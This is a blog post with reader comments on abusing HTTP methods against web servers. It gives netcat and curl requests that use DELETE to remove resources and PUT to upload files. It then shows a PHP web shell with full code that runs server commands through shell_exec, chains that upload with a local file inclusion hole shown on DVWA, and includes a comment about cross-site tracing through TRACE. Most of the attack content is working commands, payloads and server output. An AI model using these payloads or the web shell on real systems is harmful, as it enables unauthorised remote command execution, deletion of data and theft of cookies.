The HTTP protocol comprises of the following verbs or methods.
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
I assume you are well aware of these, you can read more about them in detail from this RFC document.
I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be very rare but thought of sharing 🙂
OPTIONS
The OPTIONS verb is enabled in the server it can be used to view all the HTTP methods configured.
% nc localhost 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Allow: OPTIONS, TRACE, GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Sun, 14 Jun 2015 05:31:10 GMT Connection: close
DELETE
The DELETE verb is a dangerous verb and can be misused. If this is misconfigured, can be use to delete resources from the web server.
% nc localhost 80 DELETE /location/resource HTTP/1.0 Date: Sun, 14 Jun 2015 05:01:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8
PUT
This verb can be used to upload a resource into the server. This is also a risky verb if not configured applicably. For example suppose we want to write “<?php echo ‘Hello World’; ?>” in a new file as “hello.php”. Make sure you give the correct length of your payload.
% cat -e hello.php <?php echo 'Hello World'; ?>$ % wc -m hello.php 29 hello.php % nc localhost 80 PUT /hello.php HTTP/1.0 Content-Type: text/html Content-Length: 29 <?php echo 'Hello World'; ?>
PUT verb in PHP
PHP has the support for the PUT verb. This is a sample program which will receive the data from the PUT request and save it as “myfile”.
<?php
$putdata = fopen("php://input", "r");
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024)) fwrite($fp, $data);
fclose($fp);
fclose($putdata);
?>
I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.
% cat -e phpinfo.php <?php phpinfo(); ?>$ % wc -m phpinfo.php 20 phpinfo.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 20 <?php phpinfo(); ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 06:48:16 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
Now if you view “myfile” our payload should be nice written.
Suppose you have a local file inclusion situation, in cases like that we can include our newly written file using PUT
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
<?php
echo "File included: ".$_REQUEST["page"]."&lt;br&gt;";
$file = $_REQUEST["page"];
include $file;
?>
http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile
Suppose we want to upload a simple web shell we can do it like the following 😉
% wc -m shell.php 189 shell.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 189 <?php print '<form method="post"> Command: <input type="text" name="__"><br> <input type="submit"> </form>'; if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>'; ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 07:39:42 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
After that include our “myfile” and you can execute commands on the server.
You can also use curl to upload a file using PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v * About to connect() to 192.168.1.5 port 80 (#0) * Trying 192.168.1.5... * connected * Connected to 192.168.1.5 (192.168.1.5) port 80 (#0) > PUT /put.php HTTP/1.1 > User-Agent: curl/7.26.0 > Host: 192.168.1.5 > Accept: */* > Content-Length: 189 > Expect: 100-continue > * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 100 Continue * additional stuff not fine transfer.c:1037: 0 0 * We are completely uploaded and fine * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Date: Mon, 15 Jun 2015 07:47:44 GMT < Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 < X-Powered-By: PHP/5.4.22 < Content-Length: 0 < Content-Type: text/html < * Connection #0 to host 192.168.1.5 left intact * Closing connection #0
Thanks for reading !
References
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231
wow, awesome bro . It is a new thing to learn it 😀 Thanks for writing 🙂
wow :O really nice (y) Thankx 4 sharing
Thanks for the feedback !
Nice share, you explained how to exploit PUT & DELETE, so, what about the TRACE method?
In TRACE method you can inject your own header for example:
root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com* About to connect() to Host.com port 80 (#0)
* Trying 1.1.1.1...
* connected
* Connected to Host.com (1.1.1.1) port 80 (#0)
> TRACE / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: Host.com
> Accept: */*
> X-Header: Osanda
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Wed, 17 Jun 2015 07:58:18 GMT
< Server: Apache/2.2.3 (CentOS)
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: message/http
<
TRACE / HTTP/1.1
User-Agent: curl/7.26.0
Host: Host.com
Accept: */*
X-Header: Osanda
This can lead to stealing of cookies even if the HttpOnly flags are set.
More information on XST attacks:
https://www.owasp.org/index.php/Cross_Site_Tracing